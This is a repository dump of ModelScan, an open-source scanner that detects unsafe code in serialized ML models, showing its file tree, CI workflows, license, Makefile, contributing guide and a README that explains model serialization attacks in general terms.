├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ ├── documentation-issue-report.md │ └── feature_request.md ├── dependabot.yml └── workflows │ ├── bandit.yml │ ├── black.yml │ ├── build.yml │ ├── mypy.yml │ ├── publish.yml │ └── test.yml ├── .gitignore ├── .pre-commit-config.yaml ├── CONTRIBUTING.md ├── LICENSE ├── Makefile ├── README.md ├── SECURITY.md ├── docs ├── attack-1.png ├── attack-2.png ├── attack-3.png ├── model_serialization_attacks.md └── severity_levels.md ├── imgs ├── PAI-ModelScan-banner-080323-space.png ├── PAI-ModelScan-banner-080323-white.png ├── PAI-social-product-ModelScan-1200x675.png ├── attack_example.png ├── cli_output.png ├── flow_chart.png ├── guardian_overview.png ├── logo.png ├── ml_ops_pipeline_model_scan.png ├── model_scan_flow_chart.png ├── model_scan_tutorial.gif └── modelscan-unsafe-model.gif ├── modelscan ├── __init__.py ├── _version.py ├── cli.py ├── error.py ├── issues.py ├── middlewares │ ├── __init__.py │ ├── format_via_extension.py │ └── middleware.py ├── model.py ├── modelscan.py ├── reports.py ├── scanners │ ├── __init__.py │ ├── h5 │ │ ├── __init__.py │ │ └── scan.py │ ├── keras │ │ ├── __init__.py │ │ └── scan.py │ ├── pickle │ │ ├── __init__.py │ │ └── scan.py │ ├── saved_model │ │ ├── __init__.py │ │ └── scan.py │ └── scan.py ├── settings.py ├── skip.py └── tools │ ├── LICENSE │ ├── cli_utils.py │ ├── picklescanner.py │ └── utils.py ├── notebooks ├── README.md ├── keras_fashion_mnist.ipynb ├── pytorch_sentiment_analysis.ipynb ├── tensorflow_fashion_mnist.ipynb ├── utils │ ├── pickle_codeinjection.py │ ├── pima-indians-diabetes.csv │ ├── pytorch_sentiment_model.py │ ├── tensorflow_codeinjection.py │ ├── tensorflow_fashion_mnist_model.py │ └── xgboost_diabetes_model.py └── xgboost_diabetes_classification.ipynb ├── poetry.lock ├── pyproject.toml └── tests ├── data ├── password_protected.zip └── unsafe_zip_pytorch.pt ├── test_modelscan.py └── test_utils.py /.github/ISSUE_TEMPLATE/bug_report.md: 
-------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: "[A Few Words Describing the Bug]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Use arguments '...' 16 | 2. With model '....' 17 | 3. See error '...' 18 | 19 | **Expected behavior** 20 | A clear and concise description of what you expected to happen. 21 | 22 | **Screenshots** 23 | If applicable, add screenshots to help explain your problem. 24 | 25 | **Environment (please complete the following information):** 26 | - OS [e.g. macOS 13.4 (ARM)] 27 | - Modelscan Version [e.g. v1.0.0] 28 | - ML Framework version [e.g. Tensorflow v2.13.0] (if applicable) 29 | - Describe the model serialization format that triggered this error (if applicable) 30 | 31 | **Additional context** 32 | Add any other context about the problem here. 33 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/documentation-issue-report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Documentation issue report 3 | about: Create a report to help us improve our documentation 4 | title: "[A Few Words Describing the Issue]" 5 | labels: bug, documentation 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the issue** 11 | A clear and concise description of what the issue is. 12 | 13 | **Relevant page** 14 | Link the page that should be addressed 15 | 16 | **Expected behavior/text** 17 | A clear and concise description of what you expected to see in the documentation. 18 | 19 | **Screenshots** 20 | If applicable, add screenshots to help explain your problem. 21 | 22 | **Desktop (please complete the following information):** 23 | - OS: [e.g. iOS] 24 | - Modelscan Version [e.g. 
v1.0.0] 25 | 26 | **Additional context** 27 | Add any other context about the problem here. 28 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for modelscan 4 | title: "[A Few Words Describing the Feature]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 
21 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: "pip" # See documentation for possible values 4 | directory: "/" # Location of package manifests 5 | schedule: 6 | interval: "weekly" 7 | - package-ecosystem: github-actions 8 | directory: / 9 | schedule: 10 | interval: weekly 11 | -------------------------------------------------------------------------------- /.github/workflows/bandit.yml: -------------------------------------------------------------------------------- 1 | name: Bandit 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | bandit: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: actions/setup-python@v5 15 | with: 16 | python-version: "3.9" 17 | - uses: snok/install-poetry@v1 18 | with: 19 | virtualenvs-create: true 20 | virtualenvs-in-project: true 21 | installer-parallel: true 22 | - name: Load cached venv 23 | id: cached-poetry-dependencies 24 | uses: actions/cache@v4 25 | with: 26 | path: .venv 27 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 28 | - name: Install Dependencies 29 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 30 | run: | 31 | make install-test 32 | - name: Run Bandit 33 | run: poetry run bandit -c pyproject.toml -r $(git ls-files '*.py') 34 | -------------------------------------------------------------------------------- /.github/workflows/black.yml: -------------------------------------------------------------------------------- 1 | name: Lint with Black 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | lint: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: psf/black@stable 15 | with: 16 
| version: "22.8.0" 17 | -------------------------------------------------------------------------------- /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | name: Build 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | permissions: 10 | id-token: write 11 | contents: read 12 | 13 | jobs: 14 | build: 15 | runs-on: ubuntu-latest 16 | steps: 17 | - uses: actions/checkout@v4 18 | with: 19 | fetch-depth: 0 # Necessary to get tags 20 | - uses: actions/setup-python@v5 21 | with: 22 | python-version: "3.9" 23 | - uses: snok/install-poetry@v1 24 | with: 25 | virtualenvs-create: true 26 | virtualenvs-in-project: true 27 | installer-parallel: true 28 | - name: Load cached venv 29 | id: cached-poetry-dependencies 30 | uses: actions/cache@v4 31 | with: 32 | path: .venv 33 | key: venv-prod-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 34 | - uses: mtkennerly/dunamai-action@v1 35 | with: 36 | env-var: NBD_VERSION 37 | args: --style pep440 --format "{base}.dev{distance}+{commit}" 38 | - name: Install Dependencies 39 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 40 | run: | 41 | make install-prod 42 | - name: Build Package 43 | run: | 44 | make build-prod 45 | - name: PYPI Publish Dry Run 46 | run: | 47 | poetry publish --dry-run 48 | -------------------------------------------------------------------------------- /.github/workflows/mypy.yml: -------------------------------------------------------------------------------- 1 | name: MYPY 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | branches: "*" 8 | 9 | jobs: 10 | mypy: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - uses: actions/checkout@v4 14 | - uses: actions/setup-python@v5 15 | with: 16 | python-version: "3.9" 17 | - uses: snok/install-poetry@v1 18 | with: 19 | virtualenvs-create: true 20 | virtualenvs-in-project: true 21 | 
installer-parallel: true 22 | - name: Load cached venv 23 | id: cached-poetry-dependencies 24 | uses: actions/cache@v4 25 | with: 26 | path: .venv 27 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 28 | - name: Install Dependencies 29 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 30 | run: | 31 | make install-test 32 | - name: Run MYPY 33 | run: | 34 | make mypy -------------------------------------------------------------------------------- /.github/workflows/publish.yml: -------------------------------------------------------------------------------- 1 | name: Build and Publish Release to PYPI 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | jobs: 9 | publish-modelscan: 10 | runs-on: ubuntu-latest 11 | permissions: 12 | contents: write 13 | pull-requests: write 14 | 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@v4 18 | with: 19 | fetch-depth: 0 # Necessary to get tags 20 | - uses: actions/setup-python@v5 21 | with: 22 | python-version: "3.9" 23 | - uses: snok/install-poetry@v1 24 | with: 25 | virtualenvs-create: true 26 | virtualenvs-in-project: true 27 | installer-parallel: true 28 | - name: Get Release Version 29 | uses: mtkennerly/dunamai-action@v1 30 | with: 31 | env-var: MODELSCAN_VERSION 32 | args: --style semver --format "{base}" 33 | - name: Set Package Version 34 | run: | 35 | echo "__version__ = '$MODELSCAN_VERSION'" > modelscan/_version.py 36 | poetry version $MODELSCAN_VERSION 37 | - name: Build Package 38 | run: | 39 | poetry build 40 | - name: Publish Package to PYPI 41 | run: | 42 | poetry config pypi-token.pypi ${{ secrets.MODELSCAN_PYPI_API_TOKEN }} 43 | poetry publish 44 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: Test 2 | 3 | on: 4 | push: 5 | branches: main 6 | pull_request: 7 | 
branches: "*" 8 | 9 | jobs: 10 | test: 11 | runs-on: ubuntu-latest 12 | strategy: 13 | matrix: 14 | python-version: ["3.9", "3.10", "3.11", "3.12"] 15 | 16 | steps: 17 | - uses: actions/checkout@v4 18 | - name: Set up Python ${{ matrix.python-version }} 19 | uses: actions/setup-python@v5 20 | with: 21 | python-version: ${{ matrix.python-version }} 22 | - uses: snok/install-poetry@v1 23 | with: 24 | virtualenvs-create: true 25 | virtualenvs-in-project: true 26 | installer-parallel: true 27 | - name: Load cached venv 28 | id: cached-poetry-dependencies 29 | uses: actions/cache@v4 30 | with: 31 | path: .venv 32 | key: venv-test-${{ runner.os }}-${{ steps.setup-python.outputs.python-version }}-${{ hashFiles('**/poetry.lock') }} 33 | - name: Install Dependencies 34 | if: steps.cached-poetry-dependencies.outputs.cache-hit != 'true' 35 | run: | 36 | make install-test 37 | - name: Run Tests 38 | run: | 39 | make test 40 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 86 | __pypackages__/ 87 | 88 | # Celery stuff 89 | celerybeat-schedule 90 | celerybeat.pid 91 | 92 | # SageMath parsed files 93 | *.sage.py 94 | 95 | # Environments 96 | .env 97 | .venv 98 | env/ 99 | venv/ 100 | ENV/ 101 | env.bak/ 102 | venv.bak/ 103 | 104 | # Spyder project settings 105 | .spyderproject 106 | .spyproject 107 | 108 | # Rope project settings 109 | .ropeproject 110 | 111 | # mkdocs documentation 112 | /site 113 | 114 | # mypy 115 | .mypy_cache/ 116 | .dmypy.json 117 | dmypy.json 118 | 119 | # Pyre type checker 120 | .pyre/ 121 | 122 | # pytype static type analyzer 123 | .pytype/ 124 | 125 | # Cython debug symbols 126 | cython_debug/ 127 | 128 | .DS_Store 129 | 130 | .vscode/ 131 | .idea/ 132 | 133 | # Notebook Model Downloads 134 | notebooks/PyTorchModels/ 135 | pytorch-model-scan-results.json 136 | 137 | # Code Coverage 138 | cov.xml -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | default_language_version: 2 | 
python: python3.11 3 | repos: 4 | - repo: https://github.com/psf/black 5 | rev: 24.3.0 6 | hooks: 7 | - id: black 8 | - repo: https://github.com/python-poetry/poetry 9 | rev: "1.7.1" 10 | hooks: 11 | - id: poetry-check # Makes sure poetry config is valid 12 | - id: poetry-lock # Makes sure lock file is up to date 13 | args: ["--check"] 14 | - repo: https://github.com/PyCQA/bandit 15 | rev: "1.7.8" 16 | hooks: 17 | - id: bandit 18 | args: ["-c", "pyproject.toml"] 19 | additional_dependencies: ["bandit[toml]"] 20 | exclude: notebooks 21 | - repo: https://github.com/pre-commit/mirrors-mypy 22 | rev: "v1.8.0" 23 | hooks: 24 | - id: mypy 25 | args: ["--ignore-missing-imports", "--strict", "--check-untyped-defs"] 26 | additional_dependencies: ["click>=8.1.3","numpy==1.24.0", "pytest==7.4.0", "types-requests>=1.26"] 27 | exclude: notebooks 28 | 29 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # 👩‍💻 CONTRIBUTING 2 | 3 | Welcome! We're glad to have you. If you would like to report a bug, request a new feature or enhancement, follow [this link](https://github.com/protectai/modelscan/issues/new/choose). 4 | 5 | ## ❗️ Requirements 6 | 7 | 1. Python 8 | 9 | `modelscan` requires python version `>=3.9` and `<3.13` 10 | 11 | 2. Poetry 12 | 13 | The following install commands require [Poetry](https://python-poetry.org/). To install Poetry you can follow [this installation guide](https://python-poetry.org/docs/#installation). Poetry can also be installed with brew using the command `brew install poetry`. 14 | 15 | ## 💪 Developing with modelscan 16 | 17 | 1. Clone the repo 18 | 19 | ```bash 20 | git clone git@github.com:protectai/modelscan.git 21 | ``` 22 | 23 | 2. 
To install development dependencies to your environment and set up the cli for live updates, run the following command in the root of the `modelscan` directory: 24 | 25 | ```bash 26 | make install-dev 27 | ``` 28 | 29 | 3. You are now ready to start developing! 30 | 31 | Run a scan with the cli with the following command: 32 | 33 | ```bash 34 | modelscan -p /path/to/file 35 | ``` 36 | 37 | ## 📝 Submitting Changes 38 | 39 | Thanks for contributing! In order to open a PR into the `modelscan` project, you'll have to follow these steps: 40 | 41 | 1. Fork the repo and clone your fork locally 42 | 2. Run `make install-dev` from the root of your forked repo to setup your environment 43 | 3. Make your changes 44 | 4. Submit a pull request 45 | 46 | After these steps have been completed, someone on our team at Protect AI will review the code and help merge in your changes! -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. 
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | Copyright 2023 Protect AI 179 | 180 | Licensed under the Apache License, Version 2.0 (the "License"); 181 | you may not use this file except in compliance with the License. 
182 | You may obtain a copy of the License at 183 | 184 | http://www.apache.org/licenses/LICENSE-2.0 185 | 186 | Unless required by applicable law or agreed to in writing, software 187 | distributed under the License is distributed on an "AS IS" BASIS, 188 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 189 | See the License for the specific language governing permissions and 190 | limitations under the License. -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .DEFAULT_GOAL := help 2 | VERSION ?= $(shell dunamai from git --style pep440 --format "{base}.dev{distance}+{commit}") 3 | 4 | .PHONY: env 5 | env: ## Display information about the current environment. 6 | poetry env info 7 | 8 | .PHONY: install-dev 9 | install-dev: ## Install all dependencies including dev and test dependencies, as well as pre-commit. 10 | poetry install --with dev --with test --extras "tensorflow h5py" 11 | pre-commit install 12 | 13 | .PHONY: install 14 | install: ## Install required dependencies. 15 | poetry install 16 | 17 | .PHONY: install-prod 18 | install-prod: ## Install prod dependencies. 19 | poetry install --with prod 20 | 21 | .PHONY: install-test 22 | install-test: ## Install test dependencies. 23 | poetry install --with test --extras "tensorflow h5py" 24 | 25 | .PHONY: clean 26 | clean: ## Uninstall modelscan 27 | python -m pip uninstall modelscan 28 | 29 | .PHONY: test 30 | test: ## Run pytests. 31 | poetry run pytest tests/ 32 | 33 | .PHONY: test-cov 34 | test-cov: ## Run pytests with code coverage. 35 | poetry run pytest --cov=modelscan --cov-report xml:cov.xml tests/ 36 | 37 | .PHONY: build 38 | build: ## Build the source and wheel achive. 39 | poetry build 40 | 41 | .PHONY: build-prod 42 | build-prod: version 43 | build-prod: ## Update the version and build wheel archive. 
44 | poetry build 45 | 46 | .PHONY: version 47 | version: ## Bumps the version of the project. 48 | echo "__version__ = '$(VERSION)'" > modelscan/_version.py 49 | poetry version $(VERSION) 50 | 51 | .PHONY: lint 52 | lint: bandit mypy 53 | lint: ## Run all the linters. 54 | 55 | .PHONY: bandit 56 | bandit: ## Run SAST scanning. 57 | poetry run bandit -c pyproject.toml -r . 58 | 59 | .PHONY: mypy 60 | mypy: ## Run type checking. 61 | poetry run mypy --ignore-missing-imports --strict --check-untyped-defs . 62 | 63 | .PHONY: black 64 | format: ## Run black to format the code. 65 | black . 66 | 67 | 68 | .PHONY: help 69 | help: ## List all targets and help information. 70 | @grep --no-filename -E '^([a-z.A-Z_%-/]+:.*?)##' $(MAKEFILE_LIST) | sort | \ 71 | awk 'BEGIN {FS = ":.*?(## ?)"}; { \ 72 | if (length($$1) > 0) { \ 73 | printf " \033[36m%-30s\033[0m %s\n", $$1, $$2; \ 74 | } else { \ 75 | printf "%s\n", $$2; \ 76 | } \ 77 | }' 78 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![ModelScan Banner](https://github.com/protectai/modelscan/assets/18154355/eeec657b-0d8f-42a7-b693-f35f10101d2c) 2 | [![bandit](https://github.com/protectai/modelscan/actions/workflows/bandit.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/bandit.yml) 3 | [![build](https://github.com/protectai/modelscan/actions/workflows/build.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/build.yml) 4 | [![black](https://github.com/protectai/modelscan/actions/workflows/black.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/black.yml) 5 | [![mypy](https://github.com/protectai/modelscan/actions/workflows/mypy.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/mypy.yml) 6 | 
[![tests](https://github.com/protectai/modelscan/actions/workflows/test.yml/badge.svg)](https://github.com/protectai/modelscan/actions/workflows/test.yml) 7 | [![Supported Versions](https://img.shields.io/pypi/pyversions/modelscan.svg)](https://pypi.org/project/modelscan) 8 | [![pypi Version](https://img.shields.io/pypi/v/modelscan)](https://pypi.org/project/modelscan) 9 | [![License: Apache 2.0](https://img.shields.io/crates/l/apa)](https://opensource.org/license/apache-2-0/) 10 | [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit)](https://github.com/pre-commit/pre-commit) 11 | 12 | # ModelScan: Protection Against Model Serialization Attacks 13 | 14 | Machine Learning (ML) models are shared publicly over the internet, within teams and across teams. The rise of Foundation Models have resulted in public ML models being increasingly consumed for further training/fine tuning. ML Models are increasingly used to make critical decisions and power mission-critical applications. 15 | Despite this, models are not yet scanned with the rigor of a PDF file in your inbox. 16 | 17 | This needs to change, and proper tooling is the first step. 18 | 19 | ![ModelScan Preview](/imgs/modelscan-unsafe-model.gif) 20 | 21 | ModelScan is an open source project from [Protect AI](https://protectai.com/?utm_campaign=Homepage&utm_source=ModelScan%20GitHub%20Page&utm_medium=cta&utm_content=Open%20Source) that scans models to determine if they contain 22 | unsafe code. It is the first model scanning tool to support multiple model formats. 23 | ModelScan currently supports: H5, Pickle, and SavedModel formats. This protects you 24 | when using PyTorch, TensorFlow, Keras, Sklearn, XGBoost, with more on the way. 
25 | 26 | ## TL;DR 27 | 28 | If you are ready to get started scanning your models, it is simple: 29 | 30 | ```bash 31 | pip install modelscan 32 | ``` 33 | 34 | With it installed, scan a model: 35 | 36 | ```bash 37 | modelscan -p /path/to/model_file.pkl 38 | ``` 39 | 40 | ## Why You Should Scan Models 41 | 42 | Models are often created from automated pipelines, others may come from a data scientist’s laptop. In either case the model needs to move from one machine to another before it is used. That process of saving a model to disk is called serialization. 43 | 44 | A **Model Serialization Attack** is where malicious code is added to the contents of a model during serialization(saving) before distribution — a modern version of the Trojan Horse. 45 | 46 | The attack functions by exploiting the saving and loading process of models. When you load a model with `model = torch.load(PATH)`, PyTorch opens the contents of the file and begins to running the code within. The second you load the model the exploit has executed. 47 | 48 | A **Model Serialization Attack** can be used to execute: 49 | 50 | - Credential Theft(Cloud credentials for writing and reading data to other systems in your environment) 51 | - Data Theft(the request sent to the model) 52 | - Data Poisoning(the data sent after the model has performed its task) 53 | - Model Poisoning(altering the results of the model itself) 54 | 55 | These attacks are incredibly simple to execute and you can view working examples in our 📓[notebooks](https://github.com/protectai/modelscan/tree/main/notebooks) folder. 56 | 57 | ## Enforcing And Automating Model Security 58 | 59 | ModelScan offers robust open-source scanning. If you need comprehensive AI security, consider [Guardian](https://protectai.com/guardian?utm_campaign=Guardian&utm_source=ModelScan%20GitHub%20Page&utm_medium=cta&utm_content=Open%20Source). It is our enterprise-grade model scanning product. 
